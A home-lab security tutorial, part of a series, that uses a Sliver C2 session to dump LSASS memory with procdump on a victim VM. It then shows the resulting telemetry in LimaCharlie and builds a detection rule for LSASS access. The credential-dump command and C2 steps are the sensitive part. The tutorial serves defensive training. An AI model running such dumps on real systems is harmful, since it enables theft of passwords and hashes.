Part 3 - Credential Dumping & Threat Detection

Simulating adversary tactics in a SOC lab by using Sliver C2 to dump LSASS credentials, analyzing telemetry in LimaCharlie, and creating detection rules to identify credential theft attempts.

Now We'll Get Adversarial

Setting Up the Attack

Access Sliver C2

1. Open an SSH session on your Linux VM.

2. Drop into a C2 session on your victim host.

3. If needed, retrace your steps from Part 2.

Check Privileges

1. Run the following command to check permissions:

   getprivs

2. Look for SeDebugPrivilege (required for advanced actions).

3. If missing, relaunch your C2 implant with admin rights.

---

Dump LSASS Process (Credential Theft)

Why?

Attackers dump the LSASS process to steal passwords and hashes stored in memory. These credentials can be used to access other systems.

How?

They use tools like: 🔹 Procdump – A legit Microsoft tool misused for dumping LSASS.

Run the following command to dump LSASS:

procdump -n lsass.exe -s lsass.dmp

📌 This will save the dump on your Sliver C2 server. ❗ If the command fails, telemetry may still have been generated, allowing for detection.

---

Detecting the Attack

Analyze Telemetry in LimaCharlie

1. Open the LimaCharlie web UI.

2. Navigate to Timeline on your Windows VM sensor.

   1. Use Event Type Filters to search for SENSITIVE_PROCESS_ACCESS.

      

      Key Observations

      Source Process

      • File Path: C:\Users\User\Downloads\FORTHCOMING_FLASH.exe

      • Command Line Execution: "C:\Users\User\Downloads\FORTHCOMING_FLASH.exe"

      • Unsigned Binary: Yes (Potentially Untrusted)

      • Hash: 6923c3553a1909b58c3b512be64a2e6113e998319ce39352c616f0219cb35

      Target Process

      • File Path: C:\Windows\System32\lsass.exe

      • Command Line Execution: "C:\Windows\System32\lsass.exe"

      • Signed Binary: Yes (Legitimate System File)

      Security Concern

      • Potential Credential Dumping: The unsigned binary attempted access to lsass.exe, a critical authentication process.

      • Possible Malware Activity: Credential theft tactics often target lsass.exe.

3. Identify the event related to LSASS access.

Create a Detection & Response (D&R) Rule

1. Click Create Rule based on the detected event.

   
2. Replace the Detect section with:

   event: SENSITIVE_PROCESS_ACCESS
   op: ends with
   path: event/*/TARGET/FILE_PATH
   value: lsass.exe

   
3. Replace the Respond section with:

   - action: report
     name: LSASS access

1. Save the rule as "LSASS Accessed" and enable it.

Test the Detection Rule

1. Click Target Event to see the raw event.

   
2. Scroll to the bottom and click Test Event.

   
3. If a "Match" appears, the rule is correctly detecting LSASS access.

---

Validating the Detection

Re-run the Attack

1. Return to your Sliver server and rerun:

   procdump -n lsass.exe -s lsass.dmp

2. If your C2 session dies, relaunch the malware.

   

Check for Detections

1. Open LimaCharlie and go to the Detections tab.

   
2. Click "Back to Sensors" if needed.

3. Expand the detection entry to view the raw event.

4. Click View Event Timeline to analyze when and how the attack occurred.